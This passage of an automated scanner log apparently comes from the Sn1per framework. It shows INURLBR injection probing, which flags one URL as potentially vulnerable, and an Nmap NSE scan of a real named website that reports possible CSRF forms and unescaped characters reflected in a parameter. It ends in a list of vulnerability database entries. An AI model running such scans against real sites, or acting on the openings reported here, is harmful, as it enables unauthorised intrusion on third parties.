10580 _[ - ]::--------------------------------------------------------------------------------------------------------------
10581|_[ + ] [ 59 / 100 ]-[00:23:50] [ - ]
10582|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23 ]
10583|_[ + ] Exploit::
10584|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10585|_[ + ] More details:: / - / , ISP:
10586|_[ + ] Found:: UNIDENTIFIED
10587
10588 _[ - ]::--------------------------------------------------------------------------------------------------------------
10589|_[ + ] [ 60 / 100 ]-[00:23:51] [ - ]
10590|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20 ]
10591|_[ + ] Exploit::
10592|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10593|_[ + ] More details:: / - / , ISP:
10594|_[ + ] Found:: UNIDENTIFIED
10595
10596 _[ - ]::--------------------------------------------------------------------------------------------------------------
10597|_[ + ] [ 61 / 100 ]-[00:23:52] [ - ]
10598|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=106 ]
10599|_[ + ] Exploit::
10600|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10601|_[ + ] More details:: / - / , ISP:
10602|_[ + ] Found:: UNIDENTIFIED
10603
10604 _[ - ]::--------------------------------------------------------------------------------------------------------------
10605|_[ + ] [ 62 / 100 ]-[00:23:52] [ - ]
10606|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=28 ]
10607|_[ + ] Exploit::
10608|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10609|_[ + ] More details:: / - / , ISP:
10610|_[ + ] Found:: UNIDENTIFIED
10611
10612 _[ - ]::--------------------------------------------------------------------------------------------------------------
10613|_[ + ] [ 63 / 100 ]-[00:23:53] [ - ]
10614|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=34 ]
10615|_[ + ] Exploit::
10616|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10617|_[ + ] More details:: / - / , ISP:
10618|_[ + ] Found:: UNIDENTIFIED
10619
10620 _[ - ]::--------------------------------------------------------------------------------------------------------------
10621|_[ + ] [ 64 / 100 ]-[00:23:54] [ - ]
10622|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=9 ]
10623|_[ + ] Exploit::
10624|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10625|_[ + ] More details:: / - / , ISP:
10626|_[ + ] Found:: UNIDENTIFIED
10627
10628 _[ - ]::--------------------------------------------------------------------------------------------------------------
10629|_[ + ] [ 65 / 100 ]-[00:23:54] [ - ]
10630|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59 ]
10631|_[ + ] Exploit::
10632|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10633|_[ + ] More details:: / - / , ISP:
10634|_[ + ] Found:: UNIDENTIFIED
10635
10636 _[ - ]::--------------------------------------------------------------------------------------------------------------
10637|_[ + ] [ 66 / 100 ]-[00:23:55] [ - ]
10638|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=62 ]
10639|_[ + ] Exploit::
10640|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10641|_[ + ] More details:: / - / , ISP:
10642|_[ + ] Found:: UNIDENTIFIED
10643
10644 _[ - ]::--------------------------------------------------------------------------------------------------------------
10645|_[ + ] [ 67 / 100 ]-[00:23:56] [ - ]
10646|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=77 ]
10647|_[ + ] Exploit::
10648|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10649|_[ + ] More details:: / - / , ISP:
10650|_[ + ] Found:: UNIDENTIFIED
10651
10652 _[ - ]::--------------------------------------------------------------------------------------------------------------
10653|_[ + ] [ 68 / 100 ]-[00:23:56] [ - ]
10654|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47 ]
10655|_[ + ] Exploit::
10656|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10657|_[ + ] More details:: / - / , ISP:
10658|_[ + ] Found:: UNIDENTIFIED
10659
10660 _[ - ]::--------------------------------------------------------------------------------------------------------------
10661|_[ + ] [ 69 / 100 ]-[00:23:57] [ - ]
10662|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=4 ]
10663|_[ + ] Exploit::
10664|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10665|_[ + ] More details:: / - / , ISP:
10666|_[ + ] Found:: UNIDENTIFIED
10667
10668 _[ - ]::--------------------------------------------------------------------------------------------------------------
10669|_[ + ] [ 70 / 100 ]-[00:23:58] [ - ]
10670|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=52 ]
10671|_[ + ] Exploit::
10672|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10673|_[ + ] More details:: / - / , ISP:
10674|_[ + ] Found:: UNIDENTIFIED
10675
10676 _[ - ]::--------------------------------------------------------------------------------------------------------------
10677|_[ + ] [ 71 / 100 ]-[00:23:59] [ - ]
10678|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=65&go=1 ]
10679|_[ + ] Exploit::
10680|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10681|_[ + ] More details:: / - / , ISP:
10682|_[ + ] Found:: UNIDENTIFIED
10683
10684 _[ - ]::--------------------------------------------------------------------------------------------------------------
10685|_[ + ] [ 72 / 100 ]-[00:23:59] [ - ]
10686|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100&all_reviews=1 ]
10687|_[ + ] Exploit::
10688|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10689|_[ + ] More details:: / - / , ISP:
10690|_[ + ] Found:: UNIDENTIFIED
10691
10692 _[ - ]::--------------------------------------------------------------------------------------------------------------
10693|_[ + ] [ 73 / 100 ]-[00:24:00] [ - ]
10694|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=39&go=1 ]
10695|_[ + ] Exploit::
10696|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10697|_[ + ] More details:: / - / , ISP:
10698|_[ + ] Found:: UNIDENTIFIED
10699
10700 _[ - ]::--------------------------------------------------------------------------------------------------------------
10701|_[ + ] [ 74 / 100 ]-[00:24:01] [ - ]
10702|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=57&all_reviews=1 ]
10703|_[ + ] Exploit::
10704|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10705|_[ + ] More details:: / - / , ISP:
10706|_[ + ] Found:: UNIDENTIFIED
10707
10708 _[ - ]::--------------------------------------------------------------------------------------------------------------
10709|_[ + ] [ 75 / 100 ]-[00:24:01] [ - ]
10710|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=104&all_reviews=1 ]
10711|_[ + ] Exploit::
10712|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10713|_[ + ] More details:: / - / , ISP:
10714|_[ + ] Found:: UNIDENTIFIED
10715
10716 _[ - ]::--------------------------------------------------------------------------------------------------------------
10717|_[ + ] [ 76 / 100 ]-[00:24:02] [ - ]
10718|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25&all_reviews=1 ]
10719|_[ + ] Exploit::
10720|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10721|_[ + ] More details:: / - / , ISP:
10722|_[ + ] Found:: UNIDENTIFIED
10723
10724 _[ - ]::--------------------------------------------------------------------------------------------------------------
10725|_[ + ] [ 77 / 100 ]-[00:24:03] [ - ]
10726|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23&all_reviews=1 ]
10727|_[ + ] Exploit::
10728|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10729|_[ + ] More details:: / - / , ISP:
10730|_[ + ] Found:: UNIDENTIFIED
10731
10732 _[ - ]::--------------------------------------------------------------------------------------------------------------
10733|_[ + ] [ 78 / 100 ]-[00:24:04] [ - ]
10734|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=8&all_reviews=1 ]
10735|_[ + ] Exploit::
10736|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10737|_[ + ] More details:: / - / , ISP:
10738|_[ + ] Found:: UNIDENTIFIED
10739
10740 _[ - ]::--------------------------------------------------------------------------------------------------------------
10741|_[ + ] [ 79 / 100 ]-[00:24:04] [ - ]
10742|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1&all_reviews=1 ]
10743|_[ + ] Exploit::
10744|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10745|_[ + ] More details:: / - / , ISP:
10746|_[ + ] Found:: UNIDENTIFIED
10747
10748 _[ - ]::--------------------------------------------------------------------------------------------------------------
10749|_[ + ] [ 80 / 100 ]-[00:24:05] [ - ]
10750|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43&all_reviews=1 ]
10751|_[ + ] Exploit::
10752|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10753|_[ + ] More details:: / - / , ISP:
10754|_[ + ] Found:: UNIDENTIFIED
10755
10756 _[ - ]::--------------------------------------------------------------------------------------------------------------
10757|_[ + ] [ 81 / 100 ]-[00:24:06] [ - ]
10758|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47&all_reviews=1 ]
10759|_[ + ] Exploit::
10760|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10761|_[ + ] More details:: / - / , ISP:
10762|_[ + ] Found:: UNIDENTIFIED
10763
10764 _[ - ]::--------------------------------------------------------------------------------------------------------------
10765|_[ + ] [ 82 / 100 ]-[00:24:07] [ - ]
10766|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=93&go=1 ]
10767|_[ + ] Exploit::
10768|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10769|_[ + ] More details:: / - / , ISP:
10770|_[ + ] Found:: UNIDENTIFIED
10771
10772 _[ - ]::--------------------------------------------------------------------------------------------------------------
10773|_[ + ] [ 83 / 100 ]-[00:24:07] [ - ]
10774|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=91&all_reviews=1 ]
10775|_[ + ] Exploit::
10776|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10777|_[ + ] More details:: / - / , ISP:
10778|_[ + ] Found:: UNIDENTIFIED
10779
10780 _[ - ]::--------------------------------------------------------------------------------------------------------------
10781|_[ + ] [ 84 / 100 ]-[00:24:08] [ - ]
10782|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93&all_reviews=1 ]
10783|_[ + ] Exploit::
10784|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10785|_[ + ] More details:: / - / , ISP:
10786|_[ + ] Found:: UNIDENTIFIED
10787
10788 _[ - ]::--------------------------------------------------------------------------------------------------------------
10789|_[ + ] [ 85 / 100 ]-[00:24:09] [ - ]
10790|_[ + ] Target:: [ https://www.ygmt.info/top/index.php?a=stats&u=99&all_reviews=1 ]
10791|_[ + ] Exploit::
10792|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:443
10793|_[ + ] More details:: / - / , ISP:
10794|_[ + ] Found:: UNIDENTIFIED
10795
10796 _[ - ]::--------------------------------------------------------------------------------------------------------------
10797|_[ + ] [ 86 / 100 ]-[00:24:10] [ - ]
10798|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66&all_reviews=1 ]
10799|_[ + ] Exploit::
10800|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10801|_[ + ] More details:: / - / , ISP:
10802|_[ + ] Found:: UNIDENTIFIED
10803
10804 _[ - ]::--------------------------------------------------------------------------------------------------------------
10805|_[ + ] [ 87 / 100 ]-[00:24:11] [ - ]
10806|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37&all_reviews=1 ]
10807|_[ + ] Exploit::
10808|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10809|_[ + ] More details:: / - / , ISP:
10810|_[ + ] Found:: UNIDENTIFIED
10811
10812 _[ - ]::--------------------------------------------------------------------------------------------------------------
10813|_[ + ] [ 88 / 100 ]-[00:24:11] [ - ]
10814|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19&all_reviews=1 ]
10815|_[ + ] Exploit::
10816|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10817|_[ + ] More details:: / - / , ISP:
10818|_[ + ] Found:: UNIDENTIFIED
10819
10820 _[ - ]::--------------------------------------------------------------------------------------------------------------
10821|_[ + ] [ 89 / 100 ]-[00:24:12] [ - ]
10822|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39&all_reviews=1 ]
10823|_[ + ] Exploit::
10824|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10825|_[ + ] More details:: / - / , ISP:
10826|_[ + ] Found:: UNIDENTIFIED
10827
10828 _[ - ]::--------------------------------------------------------------------------------------------------------------
10829|_[ + ] [ 90 / 100 ]-[00:24:13] [ - ]
10830|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30&all_reviews=1 ]
10831|_[ + ] Exploit::
10832|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10833|_[ + ] More details:: / - / , ISP:
10834|_[ + ] Found:: UNIDENTIFIED
10835
10836 _[ - ]::--------------------------------------------------------------------------------------------------------------
10837|_[ + ] [ 91 / 100 ]-[00:24:14] [ - ]
10838|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33&all_reviews=1 ]
10839|_[ + ] Exploit::
10840|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10841|_[ + ] More details:: / - / , ISP:
10842|_[ + ] Found:: UNIDENTIFIED
10843
10844 _[ - ]::--------------------------------------------------------------------------------------------------------------
10845|_[ + ] [ 92 / 100 ]-[00:24:14] [ - ]
10846|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=44&all_reviews=1 ]
10847|_[ + ] Exploit::
10848|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10849|_[ + ] More details:: / - / , ISP:
10850|_[ + ] Found:: UNIDENTIFIED
10851
10852 _[ - ]::--------------------------------------------------------------------------------------------------------------
10853|_[ + ] [ 93 / 100 ]-[00:24:15] [ - ]
10854|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14&all_reviews=1 ]
10855|_[ + ] Exploit::
10856|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10857|_[ + ] More details:: / - / , ISP:
10858|_[ + ] Found:: UNIDENTIFIED
10859
10860 _[ - ]::--------------------------------------------------------------------------------------------------------------
10861|_[ + ] [ 94 / 100 ]-[00:24:16] [ - ]
10862|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59&all_reviews=1 ]
10863|_[ + ] Exploit::
10864|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10865|_[ + ] More details:: / - / , ISP:
10866|_[ + ] Found:: UNIDENTIFIED
10867
10868 _[ - ]::--------------------------------------------------------------------------------------------------------------
10869|_[ + ] [ 95 / 100 ]-[00:24:18] [ - ]
10870|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=42&all_reviews=1 ]
10871|_[ + ] Exploit::
10872|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10873|_[ + ] More details:: / - / , ISP:
10874|_[ + ] Found:: UNIDENTIFIED
10875
10876 _[ - ]::--------------------------------------------------------------------------------------------------------------
10877|_[ + ] [ 96 / 100 ]-[00:24:19] [ ! ]
10878|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=61&all_reviews=1 ]
10879|_[ + ] Exploit::
10880|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10881|_[ + ] More details:: / - / , ISP:
10882|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
10883|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
10884
10885 _[ - ]::--------------------------------------------------------------------------------------------------------------
10886|_[ + ] [ 97 / 100 ]-[00:24:19] [ - ]
10887|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20&all_reviews=1 ]
10888|_[ + ] Exploit::
10889|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10890|_[ + ] More details:: / - / , ISP:
10891|_[ + ] Found:: UNIDENTIFIED
10892
10893 _[ - ]::--------------------------------------------------------------------------------------------------------------
10894|_[ + ] [ 98 / 100 ]-[00:24:20] [ - ]
10895|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15&all_reviews=1 ]
10896|_[ + ] Exploit::
10897|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10898|_[ + ] More details:: / - / , ISP:
10899|_[ + ] Found:: UNIDENTIFIED
10900
10901 _[ - ]::--------------------------------------------------------------------------------------------------------------
10902|_[ + ] [ 99 / 100 ]-[00:24:21] [ - ]
10903|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75&all_reviews=1 ]
10904|_[ + ] Exploit::
10905|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10906|_[ + ] More details:: / - / , ISP:
10907|_[ + ] Found:: UNIDENTIFIED
10908
10909[ INFO ] [ Shutting down ]
10910[ INFO ] [ End of process INURLBR at [06-10-2019 00:24:21]
10911[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 3 ]
10912[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
10913|_________________________________________________________________________________________
10914http://www.ygmt.info/top50/index.php?a=stats&u=34
10915http://www.ygmt.info/top50/index.php?a=stats&u=60
10916http://www.ygmt.info/top50/index.php?a=stats&u=61&all_reviews=1
10917
10918\_________________________________________________________________________________________/
10919#######################################################################################################################################
10920Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:24 EDT
10921NSE: Loaded 164 scripts for scanning.
10922NSE: Script Pre-scanning.
10923Initiating NSE at 00:24
10924Completed NSE at 00:24, 0.00s elapsed
10925Initiating NSE at 00:24
10926Completed NSE at 00:24, 0.00s elapsed
10927Initiating Parallel DNS resolution of 1 host. at 00:24
10928Completed Parallel DNS resolution of 1 host. at 00:24, 0.02s elapsed
10929Initiating SYN Stealth Scan at 00:24
10930Scanning www.ygmt.info (185.82.200.52) [1 port]
10931Discovered open port 443/tcp on 185.82.200.52
10932Completed SYN Stealth Scan at 00:24, 0.14s elapsed (1 total ports)
10933Initiating Service scan at 00:24
10934Scanning 1 service on www.ygmt.info (185.82.200.52)
10935Completed Service scan at 00:24, 12.84s elapsed (1 service on 1 host)
10936Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
10937Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
10938Initiating Traceroute at 00:24
10939Completed Traceroute at 00:24, 0.16s elapsed
10940Initiating Parallel DNS resolution of 14 hosts. at 00:24
10941Completed Parallel DNS resolution of 14 hosts. at 00:24, 0.22s elapsed
10942NSE: Script scanning 185.82.200.52.
10943Initiating NSE at 00:24
10944Completed NSE at 00:26, 77.00s elapsed
10945Initiating NSE at 00:26
10946Completed NSE at 00:26, 1.43s elapsed
10947Nmap scan report for www.ygmt.info (185.82.200.52)
10948Host is up (0.13s latency).
10949rDNS record for 185.82.200.52: latina.petite.guru
10950
10951PORT STATE SERVICE VERSION
10952443/tcp open ssl/ssl Apache httpd (SSL-only mode)
10953| http-brute:
10954|_ Path "/" does not require authentication
10955|_http-chrono: Request times for /; avg: 1163.27ms; min: 998.36ms; max: 1344.23ms
10956| http-csrf:
10957| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
10958| Found the following possible CSRF vulnerabilities:
10959|
10960| Path: https://www.ygmt.info:443/top50/index.php
10961| Form id:
10962| Form action: index.php
10963|
10964| Path: https://www.ygmt.info:443/top50/index.php
10965| Form id:
10966| Form action: index.php
10967|
10968| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
10969| Form id:
10970| Form action: index.php
10971|
10972| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
10973| Form id:
10974| Form action: index.php
10975|
10976| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
10977| Form id:
10978| Form action: index.php
10979|
10980| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
10981| Form id:
10982| Form action: index.php
10983|
10984| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
10985| Form id:
10986| Form action: index.php
10987|
10988| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
10989| Form id:
10990| Form action: index.php
10991|
10992| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
10993| Form id:
10994| Form action: index.php
10995|
10996| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
10997| Form id:
10998| Form action: index.php
10999|
11000| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
11001| Form id:
11002| Form action: index.php
11003|
11004| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
11005| Form id:
11006| Form action: index.php
11007|
11008| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
11009| Form id:
11010| Form action: index.php
11011|
11012| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
11013| Form id:
11014|_ Form action: index.php
11015|_http-date: Sun, 06 Oct 2019 04:24:54 GMT; -4s from local time.
11016|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
11017|_http-dombased-xss: Couldn't find any DOM based XSS.
11018|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
11019| http-errors:
11020| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
11021| Found the following error pages:
11022|
11023| Error Code: 404
11024| https://www.ygmt.info:443/android-app:/
11025|
11026| Error Code: 404
11027| https://www.ygmt.info:443/url;
11028|
11029| Error Code: 404
11030|_ https://www.ygmt.info:443/top50/android-app:/
11031|_http-feed: Couldn't find any feeds.
11032|_http-fetch: Please enter the complete path of the directory to save data in.
11033| http-headers:
11034| Date: Sun, 06 Oct 2019 04:24:53 GMT
11035| Server: Apache/2.4.10 (Debian)
11036| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
11037| ETag: "a0d-583eebde65fc0"
11038| Accept-Ranges: bytes
11039| Content-Length: 2573
11040| Vary: Accept-Encoding
11041| Connection: close
11042| Content-Type: text/html
11043|
11044|_ (Request type: HEAD)
11045|_http-jsonp-detection: Couldn't find any JSONP endpoints.
11046|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
11047| http-methods:
11048|_ Supported Methods: GET HEAD POST OPTIONS
11049|_http-mobileversion-checker: No mobile version detected.
11050| http-php-version: Logo query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
11051|_Credits query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
11052| http-security-headers:
11053| Strict_Transport_Security:
11054|_ HSTS not configured in HTTPS Server
11055|_http-server-header: Apache/2.4.10 (Debian)
11056| http-sitemap-generator:
11057| Directory structure:
11058| /
11059| Other: 1; ico: 1
11060| /bn/
11061| jpg: 3; png: 1
11062| /top50/
11063| php: 1
11064| /top50/css/
11065| css: 1
11066| /top50/js/
11067| js: 4
11068| Longest directory structure:
11069| Depth: 2
11070| Dir: /top50/js/
11071| Total files found (by extension):
11072|_ Other: 1; css: 1; ico: 1; jpg: 3; js: 4; php: 1; png: 1
11073|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
11074|_http-title: 400 Bad Request
11075| http-unsafe-output-escaping:
11076| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
11077| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
11078| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
11079| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
11080| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
11081|_ Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
11082| http-vhosts:
11083| 126 names had status 400
11084|_www.ygmt.info : 200
11085|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
11086|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
11087|_http-xssed: No previously reported XSS vuln.
11088| vulscan: VulDB - https://vuldb.com:
11089| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
11090| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
11091| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
11092| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
11093| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
11094| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
11095| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
11096| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
11097| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
11098| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
11099| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
11100| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
11101| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
11102| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
11103| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
11104| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
11105| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
11106| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
11107| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
11108| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
11109| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
11110| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
11111| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
11112| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
11113| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
11114| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
11115| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
11116| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
